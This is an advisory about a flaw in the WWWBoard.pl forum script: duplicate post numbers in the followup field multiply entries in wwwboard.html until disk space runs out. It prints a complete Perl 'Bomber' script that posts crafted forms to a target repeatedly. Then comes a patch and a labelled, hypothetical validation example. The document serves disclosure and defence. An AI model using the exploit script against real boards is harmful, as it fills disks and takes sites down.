COMMAND

    WWWBoard

SYSTEMS AFFECTED

    Systems running WWWBoard.pl

PROBLEM

    Samuel Sparling found the following.   When the  followup value  in a
    form posted to the WWWBoard  script contains the same post  number
    twice, the script follows up to that post twice, even printing the
    number of  followups to  a particular  post (on  the wwwboard.html
    file) multiple times. This exploit does even one better than  just
    'messing up' the board: if done severely enough, it can  cause the
    wwwboard.html file to  become hundreds of  megabytes in size.   It
    appears that the  number of followups  shown on the  main page (if
    there's three, it'd look like "(3)") increases exponentially  with
    this flaw,  such that  posting a  followup value  of say "5,5,5" 2
    times would make  (2) appear as  the followup value,  but it would
    appear 9 times. From the best I can tell, the number of  followups
    you have that are the same (like "3,3,3,3,3" would have 5) is  the
    number  of   times  the   followup  value   will  appear   on  the
    wwwboard.html page, and if you  post the same twice, it  does that
    number to the  second power, and  thrice does to  the third power,
    etc.  (whereas if you post "3,3,3,3,3" once, it'll have 5 followup
    numbers, if you post it twice, it'll have 25, if you post it three
    times, it'll have 125, post it ten times and it'll show  9,765,625
    times,  twelve  times  244,140,625,  thirteen times 1,220,703,125,
    etc.)  And even though it appears that only three bytes "(X)"  are
    added for each followup value  you see, there are comments  in the
    HTML  making  it  appear  as  "(<!--responses: 3-->5)" in the html
    source if there's 5 followups to message 3.

    As that shows, this can cause much more damage than just a  simple
    annoyance. This flaw could easily be exploited to the point  where
    a user's quota is maxed out, or  even to the point where  the  web
    server runs out of disk space.  Below is an exploit script, and  a
    patch to  fix the  wwwboard.pl script.   Here is  an example  Perl
    script to exploit this flaw:

    #!/usr/bin/perl
    ###################################################
    #
    # WWWBoard Bomber Exploit Script
    # Written By: Samuel Sparling (sparling@slip.net)
    #
    # Written to exploit a flaw in the WWWBoard script
    # by Matt Wright.
    #
    # Copyright © 1998 Samuel Sparling
    # All Rights Reserved.
    #
    # Written 11-04-1998
    ###################################################
    use Socket;# Tell perl to use the socket module

    # Change this if the server you're trying on uses a different port for http
    $port=80;

    print "WWWBoard Bomber Exploit Script\n\n";
    print "WWWBoard.pl URL: ";
    $url=<STDIN>;
    chop($url) if $url =~ /\n$/;

    print "Name: ";
    $name=<STDIN>;
    chop($name) if $name =~ /\n$/;

    print "E-Mail: ";
    $email=<STDIN>;
    chop($email) if $email =~ /\n$/;

    print "Subject: ";
    $subject=<STDIN>;
    chop($subject) if $subject =~ /\n$/;

    print "Message: ";
    $message=<STDIN>;
    chop($message) if $message =~ /\n$/;

    print "Followup Value: ";
    $followup=<STDIN>;
    chop($followup) if $followup =~ /\n$/;

    print "Times to Post: ";
    $stop=<STDIN>;
    chop($stop) if $stop =~ /\n$/;



            # Chop the URL into pieces to use for the actual posting
            $remote = $url;

            $remote =~ s/http\:\/\///g;
            $remote =~ s/\/([^>]|\n)*//g;

            $path = $url;
            $path =~ s/http\:\/\///g;
            $path =~ s/$remote//g;


            $forminfo =
    "name=$name&email=$email&followup=$followup&subject=$subject&body=$message";
            $forminfo =~ s/\,/\%2C/g;# Turn commas into %2C so that they can be posted.
            $forminfo =~ tr/ /+/;

            $length = length($forminfo);

            $submit = "POST $path HTTP/1.0\r\nReferer: $url\r\nUser Agent:
    Mozilla/4.01 (Win95; I)\r\nContent-type:
    application/x-www-form-urlencoded\r\nContent-length:
    $length\r\n\r\n$forminfo\r\n";

            $i=0;
            while($i < $stop)
            {
                    &post_message;
                    $i++;
                    print "$i message(s) posted.\n";
            }


    sub post_message
    {
                    if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); }
                    die("No port specified.") unless $port;
                    $iaddr = inet_aton($remote) || die("Failed to find host: $remote");
                    $paddr = sockaddr_in($port, $iaddr);
                    $proto = getprotobyname('tcp');
                    socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket:
    $!");
                    connect(SOCK, $paddr) || die("Unable to connect: $!");
                    send(SOCK,$submit,0);
                    while(<SOCK>) {
                            #print $_;# Uncomment for debugging if you have problems.
                    }
                    close(SOCK);
    }


    exit;

SOLUTION

    Below is the  patch; all it  does is check  to make sure  that the
    same followup number is not  used more than once in  the followups
    form field.  In the get_variables subroutine replace this:

       if ($FORM{'followup'}) {
          $followup = "1";
          @followup_num = split(/,/,$FORM{'followup'});
          $num_followups = @followups = @followup_num;
          $last_message = pop(@followups);
          $origdate = "$FORM{'origdate'}";
          $origname = "$FORM{'origname'}";
          $origsubject = "$FORM{'origsubject'}";
       }

    with this:

       if ($FORM{'followup'}) {
          $followup = "1";
          @followup_num = split(/,/,$FORM{'followup'});
          $num_followups = @followups = @followup_num;
          $last_message = pop(@followups);
          $origdate = "$FORM{'origdate'}";
          $origname = "$FORM{'origname'}";
          $origsubject = "$FORM{'origsubject'}";

    # WWWBoard Bomb Patch
    # Written By: Samuel Sparling (sparling@slip.net)
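            # Compare every entry against every other entry of the full
            # list (@followup_num). @followups has already lost its last
            # entry to pop() above, so checking it would let "5,5" through.
            $fn=0;
            while($fn < $num_followups)
            {
                    $dfn=0;
                    foreach $fm (@followup_num)
                    {
                            if($fm == $followup_num[$fn] && $dfn != $fn)
                            {
                                    &error('board_bomb');
                            }
                            $dfn++;
                    }
            $fn++;
            }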
    # End WWWBoard Bomb Patch
       }
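
    The following is an added example, not part of the original advisory
    or of WWWBoard. It models the growth described under PROBLEM on a
    constructed board line and shows a stricter parse of the followup
    field; rewrite_board, parse_followup and the limit of 50 entries are
    hypothetical, and the rewrite model is an assumption inferred from
    the behaviour described above.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Simplified model (an assumption inferred from the behaviour described above,
# not WWWBoard's code): each "(<!--responses: N-->C)" line is rewritten once
# per entry of the followup list that equals N.
sub rewrite_board {
    my ($lines, @followup_num) = @_;
    my @out;
    for my $line (@$lines) {
        if ($line =~ /^\(<!--responses: (\d+)-->(\d+)\)$/) {
            my ($id, $count) = ($1, $2 + 1);
            my $hits   = grep { $_ == $id } @followup_num;
            my @copies = ("(<!--responses: $id-->$count)") x $hits;
            push @out, @copies ? @copies : $line;
        } else {
            push @out, $line;
        }
    }
    return \@out;
}

# Hardened parse of the followup field (hypothetical helper): digits only,
# no repeated post number, bounded list length. Returns () on rejection.
sub parse_followup {
    my ($raw, $max) = @_;
    my (%seen, @ids);
    for my $id (split /,/, $raw) {
        return unless $id =~ /^[0-9]+$/;   # reject empty or non-numeric entries
        return if $seen{ $id + 0 }++;      # "5" and "05" name the same post
        push @ids, $id + 0;
    }
    return if !@ids || @ids > $max;
    return @ids;
}

my $raw   = '5,5,5,5,5';                   # constructed followup value
my $lines = ['(<!--responses: 5-->0)'];    # constructed board line
for my $post (1 .. 3) {
    $lines = rewrite_board($lines, split(/,/, $raw));
    printf "unvalidated, post %d: %d count lines\n", $post, scalar @$lines;
}

for my $value ($raw, '3,5', '5,05', '5,x') {   # constructed inputs
    my @ids = parse_followup($value, 50);
    printf "%-10s %s\n", $value, @ids ? "accepted (@ids)" : 'rejected';
}
```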